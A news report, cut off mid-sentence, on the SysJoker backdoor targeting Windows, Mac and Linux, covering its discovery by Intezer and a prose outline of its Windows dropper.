Cybersecurity researchers have issued a warning about SysJoker, a brand-new multiplatform malware that targets Windows, Mac, and Linux. According to them, the backdoor is able to remain undetected on all three operating systems.
The new backdoor was initially discovered in December 2021 by experts at security software company Intezer during an active attack on a Linux-based web server of a leading educational institution.
The researchers believe that the SysJoker attack began during the second half of 2021, based on command and control (C2) domain registration and the samples discovered in VirusTotal.
More on SysJoker Malware
The newly discovered backdoor is written in C++ programming language, and while each version is customized for the targeted operating system, they all go unnoticed on VirusTotal, an online malware scanning tool that uses 57 different antivirus detection engines.
SysJoker Backdoor M.O.
As explained by BleepingComputer, the Windows version, unlike the Mac and Linux samples, includes a first-stage dropper. The dropper is a DLL that uses PowerShell commands to download the SysJoker ZIP from a GitHub repository, unzip it on “C:ProgramDataRecoverySystem,” and run the payload.
As per the report, when the backdoor is executed, it sleeps for 90 to 120 seconds. Then it will start